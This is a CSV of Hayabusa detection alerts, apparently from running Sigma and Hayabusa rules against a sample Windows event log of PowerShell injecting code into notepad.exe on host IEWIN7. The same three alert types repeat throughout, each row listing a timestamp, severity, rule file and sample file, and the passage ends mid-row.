2019-05-19 02:16:16.755 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.770 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.770 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.770 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.801 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.801 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.801 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.817 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.817 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.817 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.833 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.833 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.833 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.848 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.848 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.848 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.864 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.864 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.864 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.880 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.880 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.880 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.895 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.895 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.895 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.926 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.926 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.926 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.942 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.942 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.942 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.973 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.973 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.973 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.989 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.989 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.989 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.005 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.005 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.005 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.020 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.020 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.020 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.036 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.036 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.036 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.051 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.051 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.051 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.083 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.083 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.083 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.098 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.098 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell.
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.098 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.114 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.114 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.114 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.130 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.130 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.130 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.145 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.145 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.145 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.161 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.161 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.161 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.176 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.176 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
